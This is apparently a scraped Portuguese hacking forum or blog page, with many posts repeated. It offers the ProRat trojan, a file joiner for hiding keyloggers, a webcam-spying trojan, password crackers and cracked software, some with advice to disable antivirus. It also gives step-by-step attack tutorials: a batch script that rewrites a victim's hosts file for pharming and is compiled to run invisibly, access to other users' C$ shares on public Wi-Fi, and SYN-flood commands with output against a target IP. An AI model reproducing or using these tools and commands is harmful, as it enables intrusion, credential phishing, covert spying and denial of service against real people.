Prorat v2.1 Special Edition
Se as versões do Prorat já erão boas imagine agora o Prorat v2.1 S.Edition. Um trojan de conexão reversa e com suporte a idioma português e contendo inúmeras funções, desde abri a bandeja de cd, ver a tela do pc da vítima e até da um format: c:/ . Realmente é um bom trojan para se brincar.
Gratuito
Tamanho: 3.5 MB
Sistema: Windows Xp, Windows Vista.
Empresa: Prorat.net
Tamanho: 3.5 MB
Sistema: Windows Xp, Windows Vista.
Empresa: Prorat.net
OBS: DESATIVE SEU ANTI-VIRUS ANTES DE FAZER O DOWNLOAD, POIS ISSO É UM PROGRAMA HACKER E O ANTI-VIRUS RECONHECE COMO UMA AMEAÇA !!!
[Tutorial] Técnica Pharming
INTRODUÇÃO
Resolvi fazer esse tutorial pois apesar de ter encontrado alguns artigos sobre Pharming, não encontrei nenhum desse gênero aqui no fórum. Gostaria de ressaltar também que esse tutorial é apenas didático e que portanto uso mal intencionado dele é de sua inteira responsabilidade.
Pharming é uma técnica bastante conhecida entre os hackers que praticam o phishing pois é de grande utilidade na arquitetura do golpe, principalmente quando se tem uma vítima pré-estabelecida, afinal a técnica se baseia em fazer o navegador da vítima redirecionar o site que ela digitou para um site falso, a fim de roubar dados pessoais e senhas que por ventura ela digitar nesse site, e com a vantagem de não ser detectado por antivírus e firewall.
Existem vários tipos de pharming, mas hoje irei mostrar um em específico que visa alterar o arquivo hosts do computador da vítima. O arquivo hosts, que não possui extensão, é onde ficavam gravados os endereços IP’s referentes a domínios -- mais conhecidos como sites --, devido ao fato de antigamente não existir domínio DNS. E como a cabeça das pessoas grava melhor palavras do que seqüências numéricas, como IP’s por exemplo, o arquivo hosts servia para guardar esses dados para as pessoas. Porém se usado da forma incorreta, ele pode ser configurado para redirecionar um site verdadeiro para um site falso, e se um hacker conseguir isso, vocês já imaginam o que pode acontecer... e é o que vamos mostrar a seguir.
A explicação do próprio arquivo hosts já ensina como praticar o Pharming:
INICIANDO O PHARMING
1.1. Clique em Iniciar > Executar, digite: %WINDIR%system32driverstchosts e tecle Enter. Ou se preferir vá em C:WINDOWSsystem32driverstc e dê duplo clique em hosts. Escolha abrir com o Bloco de Notas.
1.2. Abaixo da linha “127.0.0.1 localhost” insira o endereço IP do site falso e em seguida, dê um espaço e digite o endereço dns do site verdadeiro que você quer que seja redirecionado. Exemplo: “200.176.3.142 https://www.uol.com.br”, neste exemplo quando a pessoa tentar acessar o site do UOL ela será redirecionada para um outro site, que no caso é o Terra. Se você não souber qual é o IP do site basta abrir o console: Iniciar > Executar: cmd e digitar “ping https://www.site.com.br” que o IP do site aparecerá no console, como ilustra a imagem:
1.3. Assim que você terminar de editar o arquivo, -- lembrando que cada linha é um site e você não deve usar aspas – feche e salve-o. Agora entre no navegador e faça o teste para ver se está funcionando. Caso esteja tudo nos conformes vamos para a próxima parte, se não tiver redirecionado para o site que você quer então volte no início do tutorial e refaça tudo.
Você digitou https://www.uol.com.br. Tem certeza que o site é verdadeiro?
1.4. Bom, mas se for pra fazer um negócio desses no computador de alguém que você não tem acesso físico fica complicado demais, por isso agora vou ensinar você a fazer um batch script que faça todo o serviço pra você, assim só terá o trabalho de enviar para a vítima executar e criar a página fake para finalmente fazer o Phising. Primeiro abra um Bloco de Notas e cole o seguinte código:
E substitua o IP e o site pelo endereço IP do site falso e o DNS do site original, igual quando configuramos manualmente o arquivo hosts. Se tiver que fazer mais redirecionamentos basta colocar um em cada linha, deste modo:
E assim por diante…
1.5. Salve como arquivo.bat no tipo “Todos os arquivos”. Do jeito que está você já pode mandar pra vítima, mas se quiser fazer um serviço bem feito continue seguindo o tutorial, baixe o programa Bat To Exe Converter e transforme em um executável, sem ter problemas em abrir a janela do MS Dos enquanto ele é executado. Ele também tem a opção de alterar o ícone.
2.1. Clique no botão [...] e selecione o bat criado. Depois marque a opção Invisible application para não aparecer a tela do MS Dos, e para finalizar clique em Compile. Você pode também alterar o ícone dele clicando na aba Versioninformations e selecionando um ícone antes de compilar.
2.2. Agora que seu script está executável e com boa aparência, você pode usar um binder para uni-lo a outro arquivo executável e mandar para a vítima. (lembrando que se o binder tiver sido passado num scan online ele pode deixar seu arquivo detectável pelos antivírus) Outra forma também é hospedar e unir esse executável a uma técnica de auto-infect, ou mesmo compilar o código em JavaScript, para quem manja e usar um script para executar o arquivo .js dentro de um site.
É claro que essas duas últimas dicas seriam uma redundância, afinal a vítima teria que acessar um site para poder alterar as configurações dela para que ao acessar outro site ela entre no fake e por fim envie os dados para você, mas continuam valendo todas as dicas, e aqui no Invasão tem mais, inclusive tutoriais de como criar páginas fake. Mas cuidado, use sempre para sua didática.
Qualquer dúvida é só postar. Grande abraço,
Emílio [Lynx]
Resolvi fazer esse tutorial pois apesar de ter encontrado alguns artigos sobre Pharming, não encontrei nenhum desse gênero aqui no fórum. Gostaria de ressaltar também que esse tutorial é apenas didático e que portanto uso mal intencionado dele é de sua inteira responsabilidade.
Pharming é uma técnica bastante conhecida entre os hackers que praticam o phishing pois é de grande utilidade na arquitetura do golpe, principalmente quando se tem uma vítima pré-estabelecida, afinal a técnica se baseia em fazer o navegador da vítima redirecionar o site que ela digitou para um site falso, a fim de roubar dados pessoais e senhas que por ventura ela digitar nesse site, e com a vantagem de não ser detectado por antivírus e firewall.
Existem vários tipos de pharming, mas hoje irei mostrar um em específico que visa alterar o arquivo hosts do computador da vítima. O arquivo hosts, que não possui extensão, é onde ficavam gravados os endereços IP’s referentes a domínios -- mais conhecidos como sites --, devido ao fato de antigamente não existir domínio DNS. E como a cabeça das pessoas grava melhor palavras do que seqüências numéricas, como IP’s por exemplo, o arquivo hosts servia para guardar esses dados para as pessoas. Porém se usado da forma incorreta, ele pode ser configurado para redirecionar um site verdadeiro para um site falso, e se um hacker conseguir isso, vocês já imaginam o que pode acontecer... e é o que vamos mostrar a seguir.
A explicação do próprio arquivo hosts já ensina como praticar o Pharming:
- Código: Selecionar tudo
# Copyright (c) 1993-1999 Microsoft Corp. # # Este é um arquivo HOSTS de exemplo usado pelo Microsoft TCP/IP para Windows. # # Este arquivo contém os mapeamentos de endereços IP para nomes de host. Cada # entrada deve ser mantida em uma linha individual. O endereço IP deve # ser colocado na primeira coluna, seguido do nome de host correspondente. # O endereço IP e o nome do host devem ser separados por pelo menos um # espaço. # # Adicionalmente, comentários (como estes) podem ser inseridos em linhas # individuais ou após o nome de computador indicado por um símbolo '#'. # # Por exemplo: # # 102.54.94.97 rino.acme.com # servidor de origem # 38.25.63.10 x.acme.com # host cliente x 127.0.0.1 localhost
INICIANDO O PHARMING
1.1. Clique em Iniciar > Executar, digite: %WINDIR%system32driverstchosts e tecle Enter. Ou se preferir vá em C:WINDOWSsystem32driverstc e dê duplo clique em hosts. Escolha abrir com o Bloco de Notas.
1.2. Abaixo da linha “127.0.0.1 localhost” insira o endereço IP do site falso e em seguida, dê um espaço e digite o endereço dns do site verdadeiro que você quer que seja redirecionado. Exemplo: “200.176.3.142 https://www.uol.com.br”, neste exemplo quando a pessoa tentar acessar o site do UOL ela será redirecionada para um outro site, que no caso é o Terra. Se você não souber qual é o IP do site basta abrir o console: Iniciar > Executar: cmd e digitar “ping https://www.site.com.br” que o IP do site aparecerá no console, como ilustra a imagem:
1.3. Assim que você terminar de editar o arquivo, -- lembrando que cada linha é um site e você não deve usar aspas – feche e salve-o. Agora entre no navegador e faça o teste para ver se está funcionando. Caso esteja tudo nos conformes vamos para a próxima parte, se não tiver redirecionado para o site que você quer então volte no início do tutorial e refaça tudo.
Você digitou https://www.uol.com.br. Tem certeza que o site é verdadeiro?
1.4. Bom, mas se for pra fazer um negócio desses no computador de alguém que você não tem acesso físico fica complicado demais, por isso agora vou ensinar você a fazer um batch script que faça todo o serviço pra você, assim só terá o trabalho de enviar para a vítima executar e criar a página fake para finalmente fazer o Phising. Primeiro abra um Bloco de Notas e cole o seguinte código:
- Código: Selecionar tudo
@echo off echo 200.000.000.001 https://www.siteoriginal.com >>%WINDIR%system32driverstchosts
E substitua o IP e o site pelo endereço IP do site falso e o DNS do site original, igual quando configuramos manualmente o arquivo hosts. Se tiver que fazer mais redirecionamentos basta colocar um em cada linha, deste modo:
- Código: Selecionar tudo
@echo off echo 200.000.000.001 https://www.siteoriginal.com >>%WINDIR%system32driverstchosts echo 300.000.000.001 https://www.siteoriginal2.com >>%WINDIR%system32driverstchosts echo 400.000.000.001 https://www.siteoriginal3.com >>%WINDIR%system32driverstchosts
E assim por diante…
1.5. Salve como arquivo.bat no tipo “Todos os arquivos”. Do jeito que está você já pode mandar pra vítima, mas se quiser fazer um serviço bem feito continue seguindo o tutorial, baixe o programa Bat To Exe Converter e transforme em um executável, sem ter problemas em abrir a janela do MS Dos enquanto ele é executado. Ele também tem a opção de alterar o ícone.
2.1. Clique no botão [...] e selecione o bat criado. Depois marque a opção Invisible application para não aparecer a tela do MS Dos, e para finalizar clique em Compile. Você pode também alterar o ícone dele clicando na aba Versioninformations e selecionando um ícone antes de compilar.
2.2. Agora que seu script está executável e com boa aparência, você pode usar um binder para uni-lo a outro arquivo executável e mandar para a vítima. (lembrando que se o binder tiver sido passado num scan online ele pode deixar seu arquivo detectável pelos antivírus) Outra forma também é hospedar e unir esse executável a uma técnica de auto-infect, ou mesmo compilar o código em JavaScript, para quem manja e usar um script para executar o arquivo .js dentro de um site.
É claro que essas duas últimas dicas seriam uma redundância, afinal a vítima teria que acessar um site para poder alterar as configurações dela para que ao acessar outro site ela entre no fake e por fim envie os dados para você, mas continuam valendo todas as dicas, e aqui no Invasão tem mais, inclusive tutoriais de como criar páginas fake. Mas cuidado, use sempre para sua didática.
Qualquer dúvida é só postar. Grande abraço,
Emílio [Lynx]
Hackeando Notebooks em Rede Sem Fio
A internet sem fio é uma realidade e atualmente quem possui um computador com um dispositivo de acesso wireless pode usar a internet de locais públicos como cafés, bares, shoppings ou mesmo em sua própria casa.
Dizem que esta forma de conexão é tão segura que o usuário nem ao menos precisa utilizar firewalls ou outros programas para prevenir seu computador de invasões, será mesmo verdade?
Há algum tempo foi definido que qualquer computador que estivesse conectado a uma rede sem fio poderia estar se colocando em situação de risco. É verdade que os demais computadores ligados a esta mesma rede ou mesmo outros usuários pela internet poderiam tentar invadir sua máquina por meio deste acesso!
PS:. Pois vou lhes mostrar como isso é muito facil!
Primeiramente você precisa de um notebook e estar conectado a uma rede sem fio, numa faculdade por exemplo! imaginem quantos usuarios também estão conectados a mesma rede de você!
Para dar inicio a invasão você precisa saber o n° de IP dos outros ususarios, certo!
mas como saber esses n° de IPs?
Isso é muito simples, utilizando o software "SoftPerfect Network Scanner 3.8" que estarei disponiblizando o Link para o download!
SoftPerfect Network Scanner 3.8
Descrição
Programa com estrutura avançada, procura por portas TCP e mostra que tipo de recursos são compartilhados na rede. Além disso, permite montar recursos compartilhados como drives de rede e procurar por informações através dela. O scanner pode também identificar qual porta cada usuário utiliza.
Compatibilidade Windows 95, Windows 98, Windows ME, Windows 2000, Windows NT, Windows XP, Windows 2003, Windows Vista 32 Bits
Licença de uso: Freeware
Idioma: Inglês
Tamanho: 637 KB
Site do autor: SoftPerfect Research
Pronto, agora ja temos um notebook, conectado a uma rede sem fio, ja temos um sacnner de IPs, passaremos então para a melhor parte disso tudo! vamos invadir!
Coloque a SoftPerfect-Network-Scanner a rodar, e em segundos ele te dara varios n° de IPs que estão conectados a mesma rede que você.
selecione alguns, agora abra o menu executar.
Pegue o n° de IP selecionado por ex: 192.168.10.82
E digite assim:
Dizem que esta forma de conexão é tão segura que o usuário nem ao menos precisa utilizar firewalls ou outros programas para prevenir seu computador de invasões, será mesmo verdade?
Há algum tempo foi definido que qualquer computador que estivesse conectado a uma rede sem fio poderia estar se colocando em situação de risco. É verdade que os demais computadores ligados a esta mesma rede ou mesmo outros usuários pela internet poderiam tentar invadir sua máquina por meio deste acesso!
PS:. Pois vou lhes mostrar como isso é muito facil!
Primeiramente você precisa de um notebook e estar conectado a uma rede sem fio, numa faculdade por exemplo! imaginem quantos usuarios também estão conectados a mesma rede de você!
Para dar inicio a invasão você precisa saber o n° de IP dos outros ususarios, certo!
mas como saber esses n° de IPs?
Isso é muito simples, utilizando o software "SoftPerfect Network Scanner 3.8" que estarei disponiblizando o Link para o download!
SoftPerfect Network Scanner 3.8
Descrição
Programa com estrutura avançada, procura por portas TCP e mostra que tipo de recursos são compartilhados na rede. Além disso, permite montar recursos compartilhados como drives de rede e procurar por informações através dela. O scanner pode também identificar qual porta cada usuário utiliza.
Compatibilidade Windows 95, Windows 98, Windows ME, Windows 2000, Windows NT, Windows XP, Windows 2003, Windows Vista 32 Bits
Licença de uso: Freeware
Idioma: Inglês
Tamanho: 637 KB
Site do autor: SoftPerfect Research
Pronto, agora ja temos um notebook, conectado a uma rede sem fio, ja temos um sacnner de IPs, passaremos então para a melhor parte disso tudo! vamos invadir!
Coloque a SoftPerfect-Network-Scanner a rodar, e em segundos ele te dara varios n° de IPs que estão conectados a mesma rede que você.
selecione alguns, agora abra o menu executar.
Pegue o n° de IP selecionado por ex: 192.168.10.82
E digite assim:
- Código: Selecionar tudo
92.168.10.82 para acesso a pasta compartilhadas 92.168.10.82c$ para ter acesso ao C: da vítima 92.168.10.82d$ para ter acesso ao D: da vítima
Créditos: s.forrati
[Tutorial] Derrubando sites - SYN Flood
----------Derrubando sites - SYN Flood--------------------
=====================[Introdução ao ataque com synflooder.c]=====================
Oi pessoal, hoje vou mostrar como realizar um ataque SYN Flood pra derrubar sites (hosts), quem não conhece muito SYN Flood eu recomendo que leia esta artigo.
Eu usarei 2 metodos para realizar os ataques, um sera usando a ferramenta synflooder.c outro sera usando o hping3
===========================[Ferramentas]==================================
hping ---> https://www.hping.org/download.html
Obs: Para quem usa Debian basta digitar:
# apt-get install hping3
Para quem usa OpenSUSE basta digitar:
# yast install hping3
Para quem usa Fedora basta digitar:
# yum install hping3
===========================[Preparação]===================================
Agora o primeiro passo para realizar o ataque com o synflooder.c é compila-lo:
# gcc synflooder.c -o synflooder
============================[Atacando]===================================
# ./synflooder
Gimme: ./synflooder
# ./synflooder 189.23.199.200 80
Connected No: 0
Connected No: 1
Connected No: 2
Connected No: 3
Connected No: 4
Connected No: 5
Connected No: 6
Connected No: 7
Connected No: 8
Connected No: 9
Connected No: 10
Connected No: 11
Connected No: 12
Connected No: 13
Connected No: 14
Connected No: 15
Connected No: 16
Depois de um tempo o site ficara impossibilitado de receber mais conexões e qualquer pessoa que tentar entrar no site, simplesmente não ira conseguir.
======================[Introdução ao ataque com HPING3]======================
O hping3 é um programa muito util, pode ser usado para manipular o cabeçalho TCP/IP. Sera exatamente isto que vamos fazer, primeiro vamos spoofar o IP e floodar o alvo.
============================[Atacando]===================================
O comando usado sera este:
hping3 –flood --syn -a ip_falso -e “Message” -S -s porta ip_alvo
Então no konsole vamos fazer assim:
#hping3 –flood --syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 189.23.199.200
O resultado sera que o alvo ira ficar OFF:
# hping3 --flood --syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 189.23.199.200
HPING 189.23.199.200 (ppp0 189.23.199.200): S set, 40 headers + 16 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
hping in flood mode, no replies will be shown
=============================[FIM]=====================================
Espero que tenham gostado do tutorial.
# ./synflooder 189.23.199.200 80
Connected No: 0
Connected No: 1
Connected No: 2
Connected No: 3
Connected No: 4
Connected No: 5
Connected No: 6
Connected No: 7
Connected No: 8
Connected No: 9
Connected No: 10
Connected No: 11
Connected No: 12
Connected No: 13
Connected No: 14
Connected No: 15
Connected No: 16
Depois de um tempo o site ficara impossibilitado de receber mais conexões e qualquer pessoa que tentar entrar no site, simplesmente não ira conseguir.
======================[Introdução ao ataque com HPING3]======================
O hping3 é um programa muito util, pode ser usado para manipular o cabeçalho TCP/IP. Sera exatamente isto que vamos fazer, primeiro vamos spoofar o IP e floodar o alvo.
============================[Atacando]===================================
O comando usado sera este:
hping3 –flood --syn -a ip_falso -e “Message” -S -s porta ip_alvo
Então no konsole vamos fazer assim:
#hping3 –flood --syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 189.23.199.200
O resultado sera que o alvo ira ficar OFF:
# hping3 --flood --syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 189.23.199.200
HPING 189.23.199.200 (ppp0 189.23.199.200): S set, 40 headers + 16 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
hping in flood mode, no replies will be shown
=============================[FIM]=====================================
Espero que tenham gostado do tutorial.
ProRat 1.9 (pedido)
Programa usado para invadir pc pelo metodo conexão reversa,
ele é na minha opnião o segundo melhor trojan depois do turkojan 4,
eu já usei e recomendo ele,já invadi uma lan house.
Categoria: trojan
Tamanho: 2,768 kb
OBS: SENHA PARA DESCOMPACTAR É: PRO
Cactus Joiner2[1].5 (pedido)
Com esse programa vc poderá juntar o um ou mais arquivos em um só, muito usado para camulhar keyloggers e Trojans, e deixalo indetectavel para os Anti- Virús.
Modo de Usar: 1) Para iniciar click no "cactus". 2) Adicione dois arquivos no "Añadir Archivo. 3) Click em "Opciones Generales" e selecione "Con Icone" e escolha um dos Icones. 4) Agora é só clicar em "Compilar Joiner". E Pronto!
Tamanho: 1MB
Formato: N/A
Idioma: Inglês
Servidor: 4shared
Hide IP Easy 4.1.6.8 + Crack
O programa torna suas conexões seguras e anônimas, permitindo navegar sites, bater papo, enviar emails, visualizar notícias, escrever em blogs e fóruns. Sua identidade se torna segura, protegida e anônima. Todo o tráfego é roteado para servidores remotos. No seu relatório ISP, apenas os IPs dos servidores remotos são exibidos e não os IPs dos sites que visita.
O programa torna suas conexões seguras e anônimas, permitindo navegar sites, bater papo, enviar emails, visualizar notícias, escrever em blogs e fóruns. Sua identidade se torna segura, protegida e anônima. Todo o tráfego é roteado para servidores remotos. No seu relatório ISP, apenas os IPs dos servidores remotos são exibidos e não os IPs dos sites que visita.
O programa torna suas conexões seguras e anônimas, permitindo navegar sites, bater papo, enviar emails, visualizar notícias, escrever em blogs e fóruns. Sua identidade se torna segura, protegida e anônima. Todo o tráfego é roteado para servidores remotos. No seu relatório ISP, apenas os IPs dos servidores remotos são exibidos e não os IPs dos sites que visita.
Tamanho: 4 Mb
Internet de Graca no Celular
Aprenda a acessar internet do seu celular não pagando nada!Imperdível!Acabou agora seus momentos de gastar dinheiro pagando pra usar!!!
Servidor: EasyShare/BitRoad
Servidor: EasyShare/BitRoad
Estilo: Dicas
Tamanho: 1 MB
Formato: Rar
Idioma: PortuguêsComo criar conta Globo.com para BBB10 Gratis
Tamanho: 2 MB
Descrição: Tutorial ensinando como criar uma conta globo.com para poder assistir o BBB10 e outros programas exclusivos da globo.com Gratuitamente.
Descrição: Tutorial ensinando como criar uma conta globo.com para poder assistir o BBB10 e outros programas exclusivos da globo.com Gratuitamente.
DOWNLOAD
Hackeie MSN e Orkut | Unsecure 2010 + Tutorial
Esse programa serve para descobrir senhas de msn e orkut. Com alguns cliques e o e-mail da vítima é possível desbobrir sua senha. Mas isso pode lever minutos, horas ou até dias. Não nos responsabilizamos pelo seu uso, sendo que apenas upamos ele.
OBS: É recomendável não ter um antivírus instalado, devido a correr risco de infectar seu PC.
Tamanho: 284KB
Categoria: Hacker
Gerador de créditos gratis para celular
Hide IP Easy 4.1.6.6
Hide IP Easy - um programa para garantir a Internet, substituindo o seu endereço IP real para outro. Simples e bastante simples - apenas um clique e seu endereço IP real será escondido, clique em Avançar e endereço IP muda mais uma vez, assim, um terceiro clique, você pode retornar o seu endereço real.
Tamanho: 2.15MB
Webcam Spy - Trojan para MSN
Ae galera eu ainda não testei este programa, mas sei que funciona e que ele faz com que você consiga espionar a pessoa que estiver do outro lado se ela tiver um Webcam conectada ao computador, imagine então você espionando aquela gostosa ou aquele carinha sem que ele saiba que sua webcam esta ligada hahahhahhaha.
Conversor de arquivos .bat
httrack-3.43-9B para copiar sites
Smart Hack funcionando 100%
aqui posto hoje o famoso Smart -hack pedido por muitos no chat do Dicas Hacker e hoje venhu Postar ele para seu uso !
OBS:Como eu sei que vão ter muitos engraçadinhos querendo dizer que o post é fake, vou da logo minha palavra: O POST NÃO É FAKE!
Si você seguir o tutorial corretamente, que é MUITO SIMPLES, você vai conseguir (:
Créditos: https://www.hackerconection.blogspot.com
WiFi Hack AIO 2010
Desta vez nós trazemos-lhe o melhor software para cortar as redes WiFi 2010. Inclui software de criptografia poderosa na detecção de rede e é ideal para hackear redes sem fio.
Este AiO contém:
Ferramentas do Windows 1
• Wireshark
• AirSnare
• WirelessKeyView
• Monster Wifi
• NetStumbler
• Easy Wifi Radar
• SmartSniff
• Ettercap
• WinPcap
• CommView
Windows Tools 2
• Nmap
• WirelessMon
• PocketWarrior
• inSSIDer
• RemoteAnyWhere
• PmoniPacketMon
• APTools
• WiFiFoFum
• Advanced Port Scanner
• NetSurveyor
Backtrack
• Enlace de descarga para BackTrack 4 Pre Release
• Enlace de descarga para BackTrack 4 Beta
• Enlace de descarga para BackTrack 3 Imagem VmWare
• Enlace de descarga para BackTrack 3
• Enlace de descarga para BackTrack 3 Versão USB
PDF´s & Tutorials
• Redes Wireless Hacking
• Cracking WEP e WPA Wi-Fi
• Wifi Hacking
• Hacking Asus WL520GU
• Rota inversa PDFs
• WiFi Advanced Fuzzing
• Wi-Fi Segurança
• Wireless Sniffing Wireshark
• Wireless Hacking Tools
Bonus Software
• Net Tools
• WepGen
• Cantennator
• anchorfree
• Caim e Abel
• WiFi Drivers
• Brutus
• VMware Keygen
• LanHelper
Hack s0beit v3.55b
Um exelente cheater para SA-MP.
Como instalar:
Extraia os arquivos para a pasta de instalação do Gta.
Ex.: "C:Arquivos de programasRockstar GamesGTA San Andreas"
Só isso! Rode o SA:MP e bom divertimento!
Comandos:
Insert: GOD MODE
ALT: SPEED (Seu carro corre..como a LUZ! xD)
e o resto você vê apertando a tecla F11Cheats para Counter Strike
Kit 8.4 Cable Modem Hacking + Tutorial
Muitas vezes os provedores de internet a cabo limitam os utentes dependendo de tipo de cliente (residencial, profissional, empresarial)
ja imaginou remover estes limites? e utilizar a velocidade maxima k seu provedor pode oferecer tanto para upload como para download?
esta informaçao tem sido transformada em mito urbano mas eu testei e funciona, nao é possivel identificar basta manter um low profile
tou usando a 1ano (estes gajos devam maximo de down 80kb/s agora uso 256kb/s, nao é muito mas é o melhor serviço deles)
e para melhorar permite trocar o mac address do seu modem (vc pode roubar internet).. nao recomendo pk alguem vai pagar pela internet k vc usar.
simplesmente pague pelo serviço mais basico e use o melhor deles...